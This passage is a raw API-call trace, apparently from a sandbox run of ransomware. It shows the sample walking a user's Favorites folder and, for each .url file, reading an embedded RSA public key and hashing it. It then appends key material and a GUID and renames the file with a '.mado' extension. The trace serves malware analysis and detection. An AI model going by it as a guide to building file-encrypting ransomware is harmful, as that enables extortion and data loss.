(HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.355] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.355] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.355] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.355] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0205.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.357] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="MSN Websites\\" [0205.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3846b8 [0205.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.357] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0205.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66078 [0205.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3846b8 | out: hHeap=0x2c0000) returned 1 [0205.357] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0205.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0100 [0205.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0205.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66078 | out: hHeap=0x2c0000) returned 1 [0205.357] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0205.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0205.357] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0205.357] PathFindFileNameW (pszPath="") returned="" [0205.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.357] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0205.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.358] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0205.358] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0205.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x3b3348 [0205.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.358] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url") returned=".url" [0205.358] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.358] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=133) returned 1 [0205.358] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.361] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.361] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.362] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.362] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0205.362] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x85, lpOverlapped=0x0) returned 1 [0205.362] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0205.362] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.362] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.362] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0205.363] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.363] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.363] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.363] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.363] GetLastError () returned 0x0 [0205.363] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.363] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0205.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.363] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.363] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.363] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0205.363] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0205.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0205.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0205.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0205.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66078 [0205.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe778 [0205.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b660c0 [0205.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe790 [0205.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe7c0 [0205.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe808 [0205.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe7d8 [0205.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0205.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b75968 [0205.364] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b75968, Size=0x218) returned 0x3b7c6a8 [0205.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74e80 [0205.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe7c0 | out: hHeap=0x2c0000) returned 1 [0205.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe7d8 | out: hHeap=0x2c0000) returned 1 [0205.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe808 | out: hHeap=0x2c0000) returned 1 [0205.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0205.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe808 [0205.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0205.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe7d8 [0205.364] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.364] WriteFile (in: hFile=0x63c, lpBuffer=0x3b72b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b72b80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72b80 | out: hHeap=0x2c0000) returned 1 [0205.364] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.364] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.365] CloseHandle (hObject=0x63c) returned 1 [0205.365] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url.mado")) returned 1 [0205.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.366] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0205.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b3348 | out: hHeap=0x2c0000) returned 1 [0205.367] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0205.367] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url") returned=".url" [0205.367] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.368] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=133) returned 1 [0205.368] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.370] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.370] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.371] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x85, lpOverlapped=0x0) returned 1 [0205.371] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.371] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.371] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.371] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0205.372] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.372] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.372] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.372] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.372] GetLastError () returned 0x0 [0205.372] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.372] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0205.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.372] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.372] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.372] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.372] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b72b80, Size=0x218) returned 0x3b7c6a8 [0205.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74e80 [0205.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe7d8 | out: hHeap=0x2c0000) returned 1 [0205.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe7f0 | out: hHeap=0x2c0000) returned 1 [0205.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe820 | out: hHeap=0x2c0000) returned 1 [0205.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0205.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe820 [0205.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 